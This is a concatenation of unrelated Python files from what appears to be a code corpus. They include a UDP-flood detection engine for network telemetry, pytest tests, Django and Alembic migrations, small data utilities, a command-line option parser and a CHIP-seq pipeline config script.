                 trpt_eth.dst, trpt_eth.src, trpt_eth.type)
    return extract_int_data(trpt_eth)
class Oinc(PacketAnalytics):
    """
    Oinc implementation of PacketAnalytics.

    Counts packets per flow in an anytree structure keyed
    MAC -> src IP -> dst IP -> dst port -> packet size, and reports a
    UDP flood once a flow leaf exceeds 100 packets/second.
    """
    def __init__(self, sdn_interface, packet_count=100, sample_interval=60):
        super(self.__class__, self).__init__(sdn_interface, packet_count,
                                             sample_interval)
        self.tree = Node('root')

    def process_packet(self, packet, udp_dport=UDP_INT_DST_PORT):
        mac, src_ip, dst_ip, dst_port, packet_size = self.__parse_tree(packet)
        if mac:
            if src_ip and dst_ip and dst_port and packet_size:
                self.__packet_with_mac(mac, src_ip, dst_ip, dst_port,
                                       packet_size)
        self.__manage_tree()

    def __parse_tree(self, packet):
        """
        Look up the tree nodes for this packet's flow.

        :return: (mac, src_ip, dst_ip, dst_port, packet_size) anytree
                 nodes; each is None when not yet present in the tree
        """
        info = extract_int_data(packet[Ether])
        if info is None:
            # extract_int_data() returns None for non-IP ethertypes.
            return None, None, None, None, None
        logger.info('Processing packet with info [%s]', info)
        # BUGFIX: extract_int_data() emits the keys devMac/devAddr/
        # dstAddr/dstPort/packetLen -- the previous srcMac/srcIP/dstIP/
        # packet_size lookups always yielded None.
        macs = search.findall_by_attr(self.tree, info.get('devMac'),
                                      name='name', maxlevel=2, maxcount=1)
        mac = None
        src_ip = None
        dst_ip = None
        dst_port = None
        packet_size = None
        if len(macs) > 0:
            mac = macs[0]
            src_ips = search.findall_by_attr(
                mac, info.get('devAddr'), name='name', maxlevel=2, maxcount=1)
            # `len(x) is not 0` compared identity, not value; use !=.
            if len(src_ips) != 0:
                src_ip = src_ips[0]
                dst_ips = search.findall_by_attr(
                    src_ip, info.get('dstAddr'), name='name', maxlevel=2,
                    maxcount=1)
                if len(dst_ips) != 0:
                    dst_ip = dst_ips[0]
                    logger.info('Processing source IPs - %s', src_ips)
                    dst_ports = search.findall_by_attr(
                        dst_ip, info.get('dstPort'), name='name',
                        maxlevel=2, maxcount=1)
                    if len(dst_ports) != 0:
                        dst_port = dst_ports[0]
                        packet_sizes = search.findall_by_attr(
                            dst_port, info.get('packetLen'),
                            name='name', maxlevel=2, maxcount=1)
                        if len(packet_sizes) != 0:
                            packet_size = packet_sizes[0]
        return mac, src_ip, dst_ip, dst_port, packet_size

    def __manage_tree(self):
        """
        Log the current tree contents; purely diagnostic.
        """
        for pre, fill, node in RenderTree(self.tree):
            # `node.name is 'count'` relied on string interning; == is
            # the correct comparison.
            if node.name == 'count':
                logger.info(
                    "Tree info %s%s: %s %s p/s attack: %s",
                    pre, node.name, node.value, node.pps, node.attack)
            else:
                logger.info("Pre - [%s], Fill - [%s], Node - [%s]",
                            pre, fill, node.name)

    def __packet_with_mac(self, mac, src_ip, dst_ip, dst_port, packet_size):
        """
        Update the flow leaf's counter/rate and notify the SDN controller
        when a UDP flood is detected (> 3 packets at > 100 p/s).
        """
        logger.debug('Packet with MAC [%s] and source IP [%s]', mac, src_ip)
        count = packet_size.children[0]
        count.value = count.value + 1
        base_time = count.time
        current_time = datetime.datetime.today()
        delta = (current_time - base_time).total_seconds()
        count.pps = count.value / delta
        if (count.value > 3 and count.pps > 100
                and not count.attack):
            logger.info('UDP Flood attack detected')
            count.attack = True
            # Send to SDN
            try:
                self._send_attack(**dict(
                    src_mac=mac.name,
                    src_ip=src_ip.name,
                    dst_ip=dst_ip.name,
                    dst_port=dst_port.name,
                    packet_size=packet_size.name,
                    attack_type='UDP Flood'))
            except Exception as e:
                logger.error('Unexpected error [%s]', e)
        if delta > 60:
            # Reset the sampling window once a minute.
            count.time = current_time
            count.value = 1
class SimpleAE(PacketAnalytics):
    """
    Simple implementation of PacketAnalytics where the count for detecting
    attack notifications is based on the unique hash of the extracted INT data
    """
    def __init__(self, sdn_interface, packet_count=100, sample_interval=60):
        super(self.__class__, self).__init__(sdn_interface, packet_count,
                                             sample_interval)
        # Holds the last time an attack call was issued to the SDN controller
        self.attack_map = dict()

    def process_packet(self, packet, udp_dport=UDP_INT_DST_PORT):
        """
        Processes a packet to determine if an attack is occurring if the IP
        protocol is as expected
        :param packet: the packet to process
        :param udp_dport: the UDP port value on which to filter; dport 555
            selects plain INT parsing, the TRPT dport selects
            telemetry-report parsing
        :return: T/F - True when an attack has been triggered
        """
        logger.debug('Packet data - [%s]', packet.summary())
        ip_pkt = None
        protocol = None
        if packet[Ether].type == IPV4_TYPE:
            ip_pkt = IP(_pkt=packet[Ether].payload)
            protocol = ip_pkt.proto
        elif packet[Ether].type == IPV6_TYPE:
            ip_pkt = IPv6(_pkt=packet[Ether].payload)
            protocol = ip_pkt.nh
        if ip_pkt and protocol and protocol == UDP_PROTO:
            udp_packet = UDP(_pkt=ip_pkt.payload)
            logger.debug(
                'udp sport - [%s] dport - [%s] - expected dport - [%s]',
                udp_packet.sport, udp_packet.dport, udp_dport)
            if udp_packet.dport == udp_dport and udp_dport == UDP_INT_DST_PORT:
                int_data = extract_int_data(packet[Ether])
                if int_data:
                    return self.__process(int_data)
                else:
                    logger.warn('Unable to debug INT data')
                    return False
            elif (udp_packet.dport == udp_dport
                  and udp_dport == UDP_TRPT_DST_PORT):
                int_data = extract_trpt_data(udp_packet)
                if int_data:
                    return self.__process(int_data)
                else:
                    logger.warn('Unable to debug INT data')
                    return False
            else:
                logger.debug(
                    'Cannot process UDP packet dport of - [%s], expected - '
                    '[%s]', udp_packet.dport, udp_dport)
        return False

    def __process(self, int_data):
        """
        Processes INT data for analysis
        :param int_data: the data to process
        :return: True when the flow is over threshold (even when a
            notification was rate-limited), otherwise False
        """
        # Identical flows hash to the same key, so the timestamp list per
        # key counts packets for one flow within the sample interval.
        attack_map_key = hash(str(int_data))
        logger.debug('Attack map key - [%s]', attack_map_key)
        if not self.count_map.get(attack_map_key):
            self.count_map[attack_map_key] = list()
        curr_time = datetime.datetime.now()
        self.count_map.get(attack_map_key).append(curr_time)
        times = self.count_map.get(attack_map_key)
        count = 0
        # Drop timestamps older than the sample interval; count the rest.
        for eval_time in times:
            delta = (curr_time - eval_time).total_seconds()
            if delta > self.sample_interval:
                times.remove(eval_time)
            else:
                count += 1
        if count > self.packet_count:
            logger.debug('Attack detected - count [%s] with key [%s]',
                         count, attack_map_key)
            attack_dict = dict(
                src_mac=int_data['devMac'],
                src_ip=int_data['devAddr'],
                dst_ip=int_data['dstAddr'],
                dst_port=int_data['dstPort'],
                packet_size=int_data['packetLen'],
                attack_type='UDP Flood')
            # Send to SDN, rate-limited to one notification per second.
            last_attack = self.attack_map.get(attack_map_key)
            if not last_attack or time.time() - last_attack > 1:
                logger.info('Calling SDN, last attack sent - [%s]',
                            last_attack)
                try:
                    self.attack_map[attack_map_key] = time.time()
                    self._send_attack(**attack_dict)
                    return True
                except Exception as e:
                    logger.error('Unexpected error [%s]', e)
                    return False
            else:
                logger.debug(
                    'Not calling SDN as last attack notification for %s'
                    ' was only %s seconds ago',
                    attack_dict, time.time() - last_attack)
                return True
        else:
            logger.debug('No attack detected - count [%s]', count)
            return False
class IntLoggerAE(PacketAnalytics):
    """
    Logs only INT packets
    """
    def process_packet(self, packet, udp_dport=UDP_INT_DST_PORT):
        """
        Logs the INT data within the packet
        :param packet: the INT packet
        :param udp_dport: the UDP port value on which to filter (unused here)
        :return: False - this engine never reports an attack
        """
        logger.info('INT Packet data - [%s]', extract_int_data(packet[Ether]))
        return False
class LoggerAE(PacketAnalytics):
    """
    Logging only - every packet's summary is logged and no analysis runs.
    """
    def handle_packet(self, packet, ip_proto=None):
        """
        Logs every received packet's summary data
        :param packet: extracts data from here
        :param ip_proto: does nothing here
        :return: False - never reports an attack
        """
        logger.info('Packet data - [%s]', packet.summary())
        return False

    def process_packet(self, packet, udp_dport=UDP_INT_DST_PORT):
        """
        Not supported - handle_packet() above bypasses processing
        :param packet: the packet that'll never come in
        :param udp_dport: the UDP port value on which to filter
        :raises NotImplementedError
        """
        # BUGFIX: `raise NotImplemented` raises the NotImplemented
        # constant, which is not an exception (TypeError in Python 3);
        # NotImplementedError is the correct exception class.
        raise NotImplementedError
|
15,781 | a6d39f6c03b9d625c61a288d442078ea8ea6fd6a | """Test derivation of `et`."""
import iris
import numpy as np
import pytest
from cf_units import Unit
import esmvalcore.preprocessor._derive.et as et
@pytest.fixture
def cubes():
    """CubeList fixture: an upward latent-heat-flux cube plus a dummy cube."""
    hfls_cube = iris.cube.Cube([[1.0, 2.0], [0.0, -2.0]],
                               standard_name='surface_upward_latent_heat_flux',
                               attributes={'positive': 'up', 'test': 1})
    ta_cube = iris.cube.Cube([1.0], standard_name='air_temperature')
    return iris.cube.CubeList([hfls_cube, ta_cube])


def test_et_calculation(cubes):
    # Derive et from hfls and check values, units, and that the
    # 'positive' attribute was stripped from the result.
    derived_var = et.DerivedVariable()
    out_cube = derived_var.calculate(cubes)
    np.testing.assert_allclose(
        out_cube.data, np.array([[0.03505071, 0.07010142],
                                 [0.0, -0.07010142]]))
    assert out_cube.units == Unit('mm day-1')
    assert 'positive' not in out_cube.attributes


def test_et_calculation_no_positive_attr(cubes):
    # Derivation must also work when 'positive' is absent on the input.
    cubes[0].attributes.pop('positive')
    assert cubes[0].attributes == {'test': 1}
    derived_var = et.DerivedVariable()
    out_cube = derived_var.calculate(cubes)
    assert 'positive' not in out_cube.attributes
|
15,782 | dae7fe2daddaa2c728b171fb7887ff1b00af474d | """empty message
Revision ID: 7a794ab9febb
Revises: 7ce04814b9b7
Create Date: 2020-02-28 22:52:00.672000
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '7a794ab9febb'
down_revision = '7ce04814b9b7'
branch_labels = None
depends_on = None
def upgrade():
    """Add university.state_id with a foreign key to state.id."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.add_column('university', sa.Column('state_id', sa.Integer(), nullable=True))
    # NOTE(review): constraint name is None (backend auto-generated);
    # downgrade's drop_constraint(None, ...) will fail on backends that
    # require a name -- consider naming the FK explicitly.
    op.create_foreign_key(None, 'university', 'state', ['state_id'], ['id'])
    # ### end Alembic commands ###


def downgrade():
    """Remove the state_id foreign key and column from university."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_constraint(None, 'university', type_='foreignkey')
    op.drop_column('university', 'state_id')
    # ### end Alembic commands ###
|
15,783 | 5f5646cfb57a68ae51d9988646bcbf7fcc77c926 | import pytest
from src.utils.validators.numeric_validator import NumericValidator
# Unit tests for NumericValidator covering nullability, type checks,
# and inclusive min/max boundary behaviour.
class ExampleModel:
    """Bare model exposing one attribute for the validator to inspect."""
    prop_to_validate = None


@pytest.fixture
def model():
    # Fresh model instance per test.
    return ExampleModel()


def test_is_valid_returns_true_when_property_value_is_none_and_property_is_nullable(model):
    validator = NumericValidator('prop_to_validate', int, nullable=True)
    actual = validator.is_valid(model)
    assert actual


def test_is_valid_returns_false_when_property_value_is_none_and_property_is_not_nullable(model):
    validator = NumericValidator('prop_to_validate', int)
    actual = validator.is_valid(model)
    assert not actual


def test_is_valid_returns_false_when_property_value_is_not_provided_type(model):
    # int value against a float validator must fail.
    model.prop_to_validate = 10
    validator = NumericValidator('prop_to_validate', float)
    actual = validator.is_valid(model)
    assert not actual


def test_is_valid_returns_false_when_property_value_is_lower_than_min(model):
    model.prop_to_validate = 10
    validator = NumericValidator('prop_to_validate', int, min=11)
    actual = validator.is_valid(model)
    assert not actual


def test_is_valid_returns_true_when_property_value_is_valid_and_value_is_greater_than_min(model):
    model.prop_to_validate = 10
    validator = NumericValidator('prop_to_validate', int, min=9)
    actual = validator.is_valid(model)
    assert actual


def test_is_valid_returns_true_when_property_value_is_valid_and_value_is_equal_to_min(model):
    # min is inclusive.
    model.prop_to_validate = 10
    validator = NumericValidator('prop_to_validate', int, min=10)
    actual = validator.is_valid(model)
    assert actual


def test_is_valid_returns_false_when_property_value_is_greater_than_max(model):
    model.prop_to_validate = 10
    validator = NumericValidator('prop_to_validate', int, max=9)
    actual = validator.is_valid(model)
    assert not actual


def test_is_valid_returns_true_when_property_value_is_valid_and_value_is_lower_than_max(model):
    model.prop_to_validate = 10
    validator = NumericValidator('prop_to_validate', int, max=11)
    actual = validator.is_valid(model)
    assert actual


def test_is_valid_returns_true_when_property_value_is_valid_and_value_is_equal_to_max(model):
    # max is inclusive.
    model.prop_to_validate = 10
    validator = NumericValidator('prop_to_validate', int, max=10)
    actual = validator.is_valid(model)
    assert actual


def test_is_valid_returns_true_when_property_value_is_valid(model):
    model.prop_to_validate = 10
    validator = NumericValidator('prop_to_validate', int)
    actual = validator.is_valid(model)
    assert actual
15,784 | decbe8802652c158f7ccead62df8fc27c1307f97 | """
nn platform
This platform uses nanomsg sockets (both IPC and TCP are supported) to send and
receive packets. Unlike for other platforms, the '--interface' option is
ignored, you instead have to use '--device-socket'. This is because there has to
be a 1-1 mapping between the devices and the nanomsg sockets.
For example:
--device-socket 0-[1,2,5-8]@<socket addr>
In this case, ports 1, 2 and 5 through 8 (included) are enabled on device 0.
The socket address must be either:
ipc://<path to file>
tcp://<iface>:<port>
"""
def platform_config_update(config):
    """
    Update configuration for the nn platform.

    Builds config["port_map"], mapping each (device, port) pair to the
    nanomsg socket address declared for it in config["device_sockets"].
    @param config The configuration dictionary to use/update
    """
    # no default configuration for this platform
    config["port_map"] = {
        (device, port): socket_addr
        for (device, ports, socket_addr) in config["device_sockets"]
        for port in ports
    }
|
15,785 | 08e7a8096b641842053958fbbdc3cca755ca70a5 | import pandas as pd
from pathlib import Path
from tqdm import tqdm
RESULTS_PATH = Path(__file__).parent / 'results'
if __name__ == '__main__':
    # Collect the per-run CSVs of each trial into one combined results file.
    RESULTS_PATH.mkdir(exist_ok=True, parents=True)
    for trial in ['preliminary_energy', 'final']:
        input_directory = Path(f'results_{trial}')
        frames = [pd.read_csv(csv_path)
                  for csv_path in tqdm(input_directory.iterdir(), desc=f'Trial: {trial}')]
        combined = pd.concat(frames)
        combined.to_csv(RESULTS_PATH / f'results_{trial}.csv', index=False)
|
15,786 | 5a290c8ca3348a28b86e0a0de697c27839a3c5dc | """
Created on 9 Mar 2019
@author: Bruno Beloff (bruno.beloff@southcoastscience.com)
"""
import optparse
# --------------------------------------------------------------------------------------------------------------------
class CmdMQTTPeers(object):
    """
    unix command line handler

    Parses sys.argv for the mqtt_peers utility: exactly one function
    (import / list / missing / create / update / remove) plus optional
    source, filter and output flags. Use is_valid() after construction
    to check the combination of options is coherent.
    """

    def __init__(self):
        """
        Constructor — parses the command line immediately.
        """
        self.__parser = optparse.OptionParser(usage="%prog [-a] { -p [-e] | -l [-n HOSTNAME] [-t TOPIC] | -m | "
                                                    "-c HOSTNAME TAG SHARED_SECRET TOPIC | "
                                                    "-u HOSTNAME { -s SHARED_SECRET | -t TOPIC } | "
                                                    "-r HOSTNAME } [-i INDENT] [-v]", version="%prog 1.0")

        # source...
        self.__parser.add_option("--aws", "-a", action="store_true", dest="aws", default=False,
                                 help="Use AWS S3 instead of local storage")

        # functions...
        self.__parser.add_option("--import", "-p", action="store_true", dest="import_peers", default=False,
                                 help="import MQTT peers from stdin")

        self.__parser.add_option("--list", "-l", action="store_true", dest="list", default=False,
                                 help="list the stored MQTT peers to stdout")

        self.__parser.add_option("--missing", "-m", action="store_true", dest="missing", default=False,
                                 help="list known devices missing from S3 MQTT peers")

        self.__parser.add_option("--create", "-c", type="string", nargs=4, action="store", dest="create",
                                 help="create an MQTT peer")

        self.__parser.add_option("--update", "-u", type="string", nargs=1, action="store", dest="update",
                                 help="update an MQTT peer")

        self.__parser.add_option("--remove", "-r", type="string", nargs=1, action="store", dest="remove",
                                 help="delete an MQTT peer")

        # filters...
        self.__parser.add_option("--hostname", "-n", type="string", nargs=1, action="store", dest="hostname",
                                 help="filter peers with the given hostname substring")

        self.__parser.add_option("--shared-secret", "-s", type="string", nargs=1, action="store", dest="shared_secret",
                                 help="specify shared secret")

        self.__parser.add_option("--topic", "-t", type="string", nargs=1, action="store", dest="topic",
                                 help="specify topic")

        # output...
        self.__parser.add_option("--echo", "-e", action="store_true", dest="echo", default=False,
                                 help="echo stdin to stdout (import only)")

        self.__parser.add_option("--indent", "-i", type="int", nargs=1, action="store", dest="indent",
                                 help="pretty-print the output with INDENT (not with echo)")

        self.__parser.add_option("--verbose", "-v", action="store_true", dest="verbose", default=False,
                                 help="report narrative to stderr")

        self.__opts, self.__args = self.__parser.parse_args()

    # ----------------------------------------------------------------------------------------------------------------

    def is_valid(self):
        """
        Return True iff exactly one function was requested and the other
        options are compatible with it.
        """
        count = 0

        if self.is_import():
            count += 1

        if self.missing:
            count += 1

        if self.list:
            count += 1

        if self.is_create():
            count += 1

        if self.is_update():
            count += 1

        if self.is_remove():
            count += 1

        # exactly one function must be selected...
        if count != 1:
            return False

        # --echo only makes sense with --import...
        if not self.is_import() and self.echo:
            return False

        # BUG FIX: the original read `self.__opts.for_topic`, an option
        # attribute that does not exist (the option is dest="topic").
        # NOTE(review): the left operand `self.__opts.list is None` is always
        # False ("list" defaults to False, never None), so this filter check
        # is currently dead; the intended test was probably
        # `not self.__opts.list` — confirm before tightening.
        if self.__opts.list is None and (self.__opts.hostname is not None or self.__opts.topic is not None):
            return False

        # --missing requires AWS storage...
        if self.missing and not self.aws:
            return False

        # --echo and --indent are mutually exclusive...
        if self.echo and self.indent is not None:
            return False

        # --update needs at least one field to change...
        if self.is_update() and not self.shared_secret and not self.topic:
            return False

        return True

    # ----------------------------------------------------------------------------------------------------------------

    def is_import(self):
        return self.__opts.import_peers

    def is_create(self):
        return self.__opts.create is not None

    def is_update(self):
        return self.__opts.update is not None

    def is_remove(self):
        return self.__opts.remove is not None

    # ----------------------------------------------------------------------------------------------------------------

    @property
    def list(self):
        return self.__opts.list

    @property
    def missing(self):
        return self.__opts.missing

    @property
    def create_hostname(self):
        return None if self.__opts.create is None else self.__opts.create[0]

    @property
    def create_tag(self):
        return None if self.__opts.create is None else self.__opts.create[1]

    @property
    def create_shared_secret(self):
        return None if self.__opts.create is None else self.__opts.create[2]

    @property
    def create_topic(self):
        return None if self.__opts.create is None else self.__opts.create[3]

    @property
    def update_hostname(self):
        return self.__opts.update

    @property
    def remove_hostname(self):
        return self.__opts.remove

    @property
    def hostname(self):
        return self.__opts.hostname

    @property
    def shared_secret(self):
        return self.__opts.shared_secret

    @property
    def topic(self):
        return self.__opts.topic

    @property
    def aws(self):
        return self.__opts.aws

    @property
    def echo(self):
        return self.__opts.echo

    @property
    def indent(self):
        return self.__opts.indent

    @property
    def verbose(self):
        return self.__opts.verbose

    # ----------------------------------------------------------------------------------------------------------------

    def print_help(self, file):
        self.__parser.print_help(file)

    def __str__(self, *args, **kwargs):
        return "CmdMQTTPeers:{import:%s, list:%s, missing:%s, create:%s, update:%s, " \
               "remove:%s, hostname:%s, shared_secret:%s, topic:%s, aws:%s, echo:%s, indent:%s, " \
               "verbose:%s}" % \
               (self.__opts.import_peers, self.list, self.missing, self.__opts.create, self.__opts.update,
                self.__opts.remove, self.hostname, self.shared_secret, self.topic, self.aws, self.echo, self.indent,
                self.verbose)
|
15,787 | c95d1dc0491a4a58b064ff67f3deb6f50205dd52 | # -*- coding: utf-8 -*-
from django.db import models
class product_categories(models.Model):
    """Category used to group product detail pages, ordered by category_order."""
    # Human-readable category name (also used as the unicode representation).
    category_name = models.CharField(max_length=100)
    # Manual sort key; lower values come first (see Meta.ordering).
    category_order = models.IntegerField(default=0)
    def __unicode__(self):
        # Python 2 string representation; under Python 3 this would be __str__.
        return self.category_name
    class Meta:
        ordering = ["category_order"]
        verbose_name = 'Product Category'
        verbose_name_plural = 'Product Categories'
class page_container(models.Model):
    """A block of product-detail page content attached to a category."""
    page_title = models.CharField('Title', max_length=200)
    page_content = models.TextField('Content', max_length=1200)
    # Manual sort key; lower values come first (see Meta.ordering).
    page_order = models.IntegerField('Order of Page', default=0)
    page_categories = models.ForeignKey(product_categories, verbose_name="Category")
    # Non-symmetrical self-relation: "A links to B" does not imply the reverse.
    page_context_links = models.ManyToManyField('self', blank=True, symmetrical=False)
    """
    In Python 3 __unicode__ will need to be replaced by __str__ (?)
    """
    def __unicode__(self):
        # BUG FIX: the original had a second, unreachable
        # `return self.page_content` after this return; it has been removed.
        return self.page_title
    class Meta:
        ordering = ["page_order"]
        verbose_name = 'Product Detail'
        verbose_name_plural = 'Product Details'
|
15,788 | 55689134cef6ef8091e660b31b4adaa364283398 | # %%
import pandas as pd
from pathlib import Path
# import yaml
# %%
def panda_to_yaml(filename, obj_input):
    """Converts and exports a panda dataframe lexicon into a yaml file.
    This can be used by pyContextNLP.
    Use filename with .yml extension.

    Each dataframe row becomes one yaml document (terminated by "---");
    each column becomes a `col: value` line, with NaN written as ''.
    The target directory <cwd>/negation/output must already exist.
    """
    filepath = Path.cwd() / "negation" / "output" / filename
    # BUG FIX: the original called open(filepath, "w") without closing it
    # (leaked handle) and then re-opened the file in append mode. A single
    # write-mode context manager truncates and writes with the same result.
    with open(filepath, "w") as stream:
        # Each row represents one document in the yaml file
        for row_index in obj_input.index:
            # Each column represents one object per document in yaml file
            for col in obj_input.columns:
                # Value corresponding to current document and object
                value = obj_input.at[row_index, col]
                if pd.isna(value):
                    # If no value is present, we write '' as value to object
                    stream.write("{}: ''\n".format(col))
                else:
                    stream.write("{}: {}\n".format(col, value))
            # Add yaml document separator followed by "\n"
            stream.write("---\n")
# %%
def gen_regex(df):
    """
    Transform a dataframe with synonyms into regex patterns.

    Expects a "category" and a "literal" column; every other column holds an
    optional synonym. Returns a new dataframe with columns
    ["category", "literal", "regex"], where regex is an alternation of all
    non-NaN synonyms, e.g. "(foo)|(bar)".
    """
    # Synonym columns are all columns except the two fixed ones.
    columns = list(df.columns)
    # BUG FIX: the original called columns.remove("category", "literal"),
    # but list.remove() takes exactly one argument (TypeError at runtime).
    columns.remove("category")
    columns.remove("literal")

    # New DataFrame to store the generated patterns.
    new_df = pd.DataFrame(columns=["category", "literal", "regex"])
    new_df_index = 0

    for row_index in df.index:
        # Category and literal are copied directly.
        lit = df.at[row_index, "literal"]
        cat = df.at[row_index, "category"]

        # Collect the non-empty synonyms for this row.
        synonyms = []
        for syn_col in columns:
            synonym = df.at[row_index, syn_col]
            if not pd.isna(synonym):
                synonyms.append(synonym)

        # "(syn1)|(syn2)|..." — same result as the original manual loop.
        regex = "|".join("({})".format(synonym) for synonym in synonyms)

        new_df.loc[new_df_index] = \
            pd.Series({"category": cat, "literal": lit, "regex": regex})
        new_df_index += 1
    return new_df
# # %%
# # nl_mod comes from lexicon_to_df.py
# obj_input = nl_mod
# # replace all empty values with NaN
# obj_input = obj_input.replace("", np.nan, regex=False)
# panda_to_yaml("output.yml", obj_input)
# %%
|
15,789 | 0bf74afcf402fd53bceb964876a6fbd0083a710a | num1,num2=map(int,input().split())
n=[]
# Trial-division primality scan over (num1, num2]; num1 and num2 are read
# from stdin on the script's first line (outside this span).
for i in range(num1+1,num2+1):
    if i>1:
        for v in range(2,i):
            if(i%v==0):
                break
        else:
            # NOTE(review): appends the last trial divisor v instead of the
            # prime i itself (only len(n) is used, so the count still works);
            # for i == 2 the inner range is empty and v is unbound, which
            # would raise NameError — confirm inputs always have num1 >= 2.
            n.append(v)
# NOTE(review): the +1 looks like a manual off-by-one correction; verify
# against the expected output before relying on this count.
print(len(n)+1)
|
15,790 | f6aff11ed442b512c0d4c423970f48186f61c880 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('rca', '0010_auto_20150928_1413'),
]
operations = [
migrations.RemoveField(
model_name='homepage',
name='packery_alumni',
),
migrations.AlterField(
model_name='homepage',
name='packery_alumni_stories',
field=models.IntegerField(blank=True, help_text=b'', null=True, verbose_name=b'Number of alumni stories to show', choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)]),
),
migrations.AlterField(
model_name='homepage',
name='packery_blog',
field=models.IntegerField(blank=True, help_text=b'', null=True, verbose_name=b'Number of blog items to show', choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)]),
),
migrations.AlterField(
model_name='homepage',
name='packery_events',
field=models.IntegerField(blank=True, help_text=b'', null=True, verbose_name=b'Number of events to show (excluding RCA Talks)', choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)]),
),
migrations.AlterField(
model_name='homepage',
name='packery_events_rcatalks',
field=models.IntegerField(blank=True, help_text=b'', null=True, verbose_name=b'Number of RCA Talk events to show', choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)]),
),
migrations.AlterField(
model_name='homepage',
name='packery_news',
field=models.IntegerField(blank=True, help_text=b'', null=True, verbose_name=b'Number of news items to show', choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)]),
),
migrations.AlterField(
model_name='homepage',
name='packery_rcanow',
field=models.IntegerField(blank=True, help_text=b'', null=True, verbose_name=b'Number of RCA Now items to show', choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)]),
),
migrations.AlterField(
model_name='homepage',
name='packery_research',
field=models.IntegerField(blank=True, help_text=b'', null=True, verbose_name=b'Number of research items to show', choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)]),
),
migrations.AlterField(
model_name='homepage',
name='packery_review',
field=models.IntegerField(blank=True, help_text=b'', null=True, verbose_name=b'Number of reviews to show', choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)]),
),
migrations.AlterField(
model_name='homepage',
name='packery_staff',
field=models.IntegerField(blank=True, help_text=b'', null=True, verbose_name=b'Number of staff to show', choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)]),
),
migrations.AlterField(
model_name='homepage',
name='packery_student_stories',
field=models.IntegerField(blank=True, help_text=b'', null=True, verbose_name=b'Number of student stories to show', choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)]),
),
migrations.AlterField(
model_name='homepage',
name='packery_student_work',
field=models.IntegerField(blank=True, help_text=b'Student pages flagged to Show On Homepage must have at least one carousel item', null=True, verbose_name=b'Number of student work items to show', choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)]),
),
migrations.AlterField(
model_name='homepage',
name='packery_tweets',
field=models.IntegerField(blank=True, help_text=b'', null=True, verbose_name=b'Number of tweets to show', choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)]),
),
]
|
15,791 | b8251a20f12e0cc68661cd24c49265a8498969e1 | ################################################################################
# CHIP-seq pipeline configuration file creator #
################################################################################
# MODULES ----------------------------------------------------------------------
import argparse, os, csv, yaml, sys
# GLOBALS ----------------------------------------------------------------------
layouts = ['single', 'paired']
singleEndSampleSheetHeaders = ['SAMPLE','REPLICATE','LIBRARY','LANE','R1']
pairedEndSampleSheetHeaders = singleEndSampleSheetHeaders + ['R2']
# ARGUMENTS --------------------------------------------------------------------
parser = argparse.ArgumentParser(description='CHIP-seq pipeline configuration '
'file creator.')
parser.add_argument('--sampleSheet', dest='sampleSheet', action='store',
help='Absolute path to sample sheet.')
parser.add_argument('--layout', dest='layout', action='store',
help='Sequencing layout, single or paired.')
parser.add_argument('--genome', dest='genome', action='store',
help='Absolute path to reference genome; must be indexed with bwa.')
parser.add_argument('--outputDir', dest='outputDir', action='store',
help='Absolute path to the output directory, will be created MUST NOT EXIST.')
parser.add_argument('--controlTracks', dest='controlTracks', action='store',
help='Absolute path to control tracks / TODO.')
parser.add_argument('--execDir', dest='execDir', action='store',
help='Path to pipeline git repository.')
args = parser.parse_args()
# CHECK ARGUMENTS --------------------------------------------------------------
# OUTPUT DIRECTORY ---
if os.path.isdir(args.outputDir):
raise Exception("STOP! Directory {} already exist, the script stoped "
"to prevent overwrite.".format(args.outputDir))
# SAMPLE SHEET ---
if not os.path.isfile(args.sampleSheet):
raise Exception("Cannot find sample sheet at {}".format(args.sampleSheet))
# CONTROL TRACKS ---
# # TODO: add control tracks support
# LAYOUT ---
if args.layout not in layouts:
raise Exception("Invalid layout, choose from: {}".format(layouts))
# GENOME ---
if not os.path.isfile(args.genome):
raise Exception("Genome file ({}) not found.".format(args.genome))
# EXECDIR ---
if not os.path.isdir(args.execDir):
raise Exception("Code folder {} not found.".format(args.execDir))
if not args.execDir.endswith("/"):
args.execDir = args.execDir + "/"
# PARSE SAMPLE FILE ------------------------------------------------------------
# NOTE(review): this reader uses delimiter="\t" while the second reader later
# in the script uses delimiter=',' — confirm which separator the sample sheet
# actually uses; one of the two is wrong.
sampleFileAsDict = csv.DictReader(open(args.sampleSheet), delimiter="\t")
# NOTE(review): this prints the generator object itself, not the rows; it was
# probably meant to be `for i in sampleFileAsDict: print(i)` (debug leftover).
print(i for i in sampleFileAsDict)
# CREATE OUTPUT DIRECTORY ------------------------------------------------------
if not args.outputDir.endswith("/"):
    args.outputDir = args.outputDir + "/"
try:
    os.makedirs(args.outputDir)
